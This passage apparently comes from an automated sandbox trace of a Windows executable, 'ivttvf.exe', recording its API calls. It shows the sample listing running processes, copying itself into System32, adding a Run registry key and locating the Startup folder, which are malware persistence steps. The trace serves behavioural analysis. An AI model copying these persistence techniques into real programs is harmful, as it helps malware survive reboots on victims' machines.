szExeFile="svchost.exe")) returned 1 [0030.769] lstrlenW (lpString="svchost.exe") returned 11 [0030.769] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.769] lstrlenW (lpString="svchost.exe") returned 11 [0030.769] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0030.770] lstrlenW (lpString="dwm.exe") returned 7 [0030.770] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0030.770] lstrlenW (lpString="explorer.exe") returned 12 [0030.770] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0030.771] lstrlenW (lpString="spoolsv.exe") returned 11 [0030.771] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0030.772] lstrlenW (lpString="taskhost.exe") returned 12 [0030.772] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.772] lstrlenW (lpString="svchost.exe") returned 11 [0030.772] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0030.773] lstrlenW (lpString="taskeng.exe") returned 11 [0030.773] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0030.773] lstrlenW (lpString="taskhost.exe") returned 12 [0030.773] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0030.774] lstrlenW (lpString="called.exe") returned 10 [0030.774] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0030.774] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0030.774] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0030.775] lstrlenW (lpString="analyst.exe") returned 11 [0030.775] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0030.775] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0030.775] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0030.776] lstrlenW (lpString="wages.exe") returned 9 [0030.776] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0030.777] lstrlenW (lpString="rand.exe") returned 8 [0030.777] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0030.777] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0030.777] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0030.778] lstrlenW (lpString="cottage.exe") returned 11 [0030.778] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0030.778] lstrlenW (lpString="pairs_spec.exe") returned 14 [0030.778] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0030.779] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0030.779] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0030.779] lstrlenW (lpString="observationshairy.exe") returned 21 [0030.779] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0030.780] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0030.780] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0030.780] lstrlenW (lpString="spectrum.exe") returned 12 [0030.780] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0030.781] lstrlenW (lpString="dies.exe") returned 8 [0030.781] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0030.781] lstrlenW (lpString="configured.exe") returned 14 [0030.781] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0030.782] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0030.782] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0030.782] lstrlenW (lpString="fast.exe") returned 8 [0030.783] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0030.783] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0030.783] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0030.784] lstrlenW (lpString="review.exe") returned 10 [0030.784] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0030.784] lstrlenW (lpString="historybinding.exe") returned 18 [0030.784] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0030.785] lstrlenW (lpString="pk task surge.exe") returned 17 [0030.785] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0030.785] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0030.785] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0030.786] lstrlenW (lpString="mobsync.exe") returned 11 [0030.786] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0030.786] lstrlenW (lpString="dllhost.exe") returned 11 [0030.787] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0030.787] lstrlenW (lpString="dllhost.exe") returned 11 [0030.787] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0030.788] lstrlenW (lpString="ivttvf.exe") returned 10 [0030.788] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 0 [0030.788] CloseHandle (hObject=0xe0) returned 1 [0030.788] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5268 | out: hHeap=0x570000) returned 1 [0030.788] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a52b0 | out: hHeap=0x570000) returned 1 [0030.788] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a52f8 | out: hHeap=0x570000) returned 1 [0030.788] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5318 | out: hHeap=0x570000) returned 1 [0030.788] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5360 | out: hHeap=0x570000) returned 1 [0030.788] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a4a00 | out: hHeap=0x570000) returned 1 [0030.788] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x584718 | out: hHeap=0x570000) returned 1 [0030.788] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x584750 | out: hHeap=0x570000) returned 1 [0030.788] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x584348 | out: hHeap=0x570000) returned 1 [0030.788] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x584370 | out: hHeap=0x570000) returned 1 [0030.788] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x584798 | out: hHeap=0x570000) returned 1 [0030.788] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x584398 | out: hHeap=0x570000) returned 1 [0030.788] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x5ab428 [0030.789] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x5bb430 [0030.789] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a00 [0030.789] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a00, Size=0x20) returned 0x584398 [0030.789] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584398, Size=0x40) returned 0x5a69a8 [0030.789] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a00 [0030.789] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a00, Size=0x20) returned 0x584398 [0030.789] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a00 [0030.789] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a00, Size=0x20) returned 0x584370 [0030.789] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a00 [0030.789] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a00, Size=0x20) returned 0x584348 [0030.789] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584348, Size=0x40) returned 0x5a69f0 [0030.789] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5bb430, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ivttvf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ivttvf.exe")) returned 0x30 [0030.789] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x5cb438 [0030.790] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x5db440 [0030.790] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a00 [0030.790] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a00, Size=0x20) returned 0x584348 [0030.790] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x584348, Size=0x40) returned 0x5a6a38 [0030.790] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a6a38, Size=0x80) returned 0x5a5268 [0030.790] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a5268, Size=0x100) returned 0x5a7bb0 [0030.790] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0030.790] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a7bb0 | out: hHeap=0x570000) returned 1 [0030.790] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\System32\\ivttvf.exe", lpDst=0x5cb438, nSize=0x7fff | out: lpDst="C:\\Windows\\System32\\ivttvf.exe") returned 0x1f [0030.790] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5db440 | out: hHeap=0x570000) returned 1 [0030.790] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5cb438 | out: hHeap=0x570000) returned 1 [0030.790] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x100000) returned 0x2080020 [0030.790] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a00 [0030.790] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a00, Size=0x20) returned 0x584348 [0030.790] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a00 [0030.790] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a00, Size=0x20) returned 0x5a5930 [0030.790] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0030.790] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0030.791] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x0) returned 1 [0030.791] lstrlenW (lpString="kernel32.dll") returned 12 [0030.791] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x584348 | out: hHeap=0x570000) returned 1 [0030.791] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0030.791] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5930 | out: hHeap=0x570000) returned 1 [0030.791] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ivttvf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ivttvf.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe0 [0030.791] CreateFileW (lpFileName="C:\\Windows\\System32\\ivttvf.exe" (normalized: "c:\\windows\\system32\\ivttvf.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0030.792] ReadFile (in: hFile=0xe0, lpBuffer=0x2080020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x2080020*, lpNumberOfBytesRead=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0030.804] WriteFile (in: hFile=0xe4, lpBuffer=0x2080020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x2080020*, lpNumberOfBytesWritten=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0030.807] ReadFile (in: hFile=0xe0, lpBuffer=0x2080020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x2080020*, lpNumberOfBytesRead=0x18fd98*=0x0, lpOverlapped=0x0) returned 1 [0030.807] CloseHandle (hObject=0xe4) returned 1 [0030.809] CloseHandle (hObject=0xe0) returned 1 [0030.809] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a00 [0030.809] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a00, Size=0x20) returned 0x5a5930 [0030.809] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a00 [0030.809] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a00, Size=0x20) returned 0x5a58e0 [0030.809] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0030.809] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0030.809] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0030.809] lstrlenW (lpString="kernel32.dll") returned 12 [0030.809] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a58e0 | out: hHeap=0x570000) returned 1 [0030.809] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0030.809] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5930 | out: hHeap=0x570000) returned 1 [0030.809] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2080020 | out: hHeap=0x570000) returned 1 [0030.814] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a00 [0030.814] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a00, Size=0x20) returned 0x5a5930 [0030.814] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a5930, Size=0x40) returned 0x5a6a38 [0030.814] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a6a38, Size=0x80) returned 0x5cb450 [0030.814] lstrlenW (lpString="C:\\Windows\\System32\\ivttvf.exe") returned 30 [0030.814] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0030.814] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x5c) returned 0x5a5268 [0030.814] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x18fd6c | out: phkResult=0x18fd6c*=0xe0) returned 0x0 [0030.814] RegSetValueExW (in: hKey=0xe0, lpValueName="ivttvf.exe", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\System32\\ivttvf.exe", cbData=0x3c | out: lpData="C:\\Windows\\System32\\ivttvf.exe") returned 0x0 [0030.815] RegCloseKey (hKey=0xe0) returned 0x0 [0030.815] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5268 | out: hHeap=0x570000) returned 1 [0030.815] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0030.815] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5cb450 | out: hHeap=0x570000) returned 1 [0030.815] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x5cd438 [0030.815] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x5dd440 [0030.815] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5a4a00 [0030.815] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a4a00, Size=0x20) returned 0x5a5930 [0030.815] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a5930, Size=0x40) returned 0x5a6a38 [0030.815] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5a6a38, Size=0x80) returned 0x5cb450 [0030.815] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5cb450, Size=0x100) returned 0x5a7bb0 [0030.815] lstrlenW (lpString="") returned 0 [0030.815] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0030.815] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8c) returned 0x5a7cb8 [0030.815] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fd18 | out: phkResult=0x18fd18*=0xe0) returned 0x0 [0030.815] RegQueryValueExW (in: hKey=0xe0, lpValueName="Startup", lpReserved=0x0, lpType=0x18fd24, lpData=0x5dd440, lpcbData=0x18fd50*=0x7fff | out: lpType=0x18fd24*=0x0, lpData=0x5dd440*=0x53, lpcbData=0x18fd50*=0x7fff) returned 0x2 [0030.815] RegCloseKey (hKey=0xe0) returned 0x0 [0030.815] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a7cb8 | out: hHeap=0x570000) returned 1 [0030.815] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0030.815] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8c) returned 0x5a7cb8 [0030.815] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fd18 | out: phkResult=0x18fd18*=0xe4) returned 0x0 [0030.816] RegQueryValueExW (in: hKey=0xe4, lpValueName="Startup", lpReserved=0x0, lpType=0x18fd24, lpData=0x5dd440, lpcbData=0x18fd50*=0x7fff | out: lpType=0x18fd24*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x18fd50*=0x98) returned 0x0 [0030.816] RegCloseKey (hKey=0xe4) returned 0x0 [0030.816] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a7cb8 | out: hHeap=0x570000) returned 1 [0030.816] lstrlenW (lpString="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 75 [0030.816] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0030.816] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a7bb0 | out: hHeap=0x570000) returned 1 [0030.816] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ivttvf.exe", lpDst=0x5cd438, nSize=0x7fff | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ivttvf.exe") returned 0x67 [0030.816] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5dd440 | out: hHeap=0x570000) returned 1 [0030.816] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5cd438 | out: hHeap=0x570000) returned 1 [0030.816] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x100000) returned 0x2080020 [0030.816] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 